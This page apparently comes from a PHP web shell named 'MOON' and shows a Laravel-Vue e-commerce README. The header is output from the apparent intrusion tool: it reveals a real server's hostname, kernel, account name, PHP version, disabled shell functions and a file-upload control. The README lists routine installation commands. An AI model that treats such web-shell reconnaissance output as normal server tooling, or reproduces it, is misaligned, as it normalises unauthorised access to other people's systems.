MOON
Server: Apache
System: Linux e2e-78-16.ssdcloudindia.net 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User: imensosw (1005)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/imensosw/www/amanda/README.md
# Laravel-Vue-Ecommerce
E-commerce application using Laravel 5 and Vue 

Laravel-Vue-Ecommerce is an e-commerce platform using Laravel and Vue.

--------- Requirements

The Laravel-Stocks website requires a server with PHP 5.4+ The database engine that is used to store data for this application could be any of the engines supported by Laravel: MySQL, Postgres, SQLite and SQL Server.

--------- How to use

-Clone the repository with git clone

-Copy .env.example file to .env and edit database credentials there

-Run composer install

-Run php artisan key:generate

-Run php artisan passport:install

-php artisan db:seed

-npm install

-php artisan serve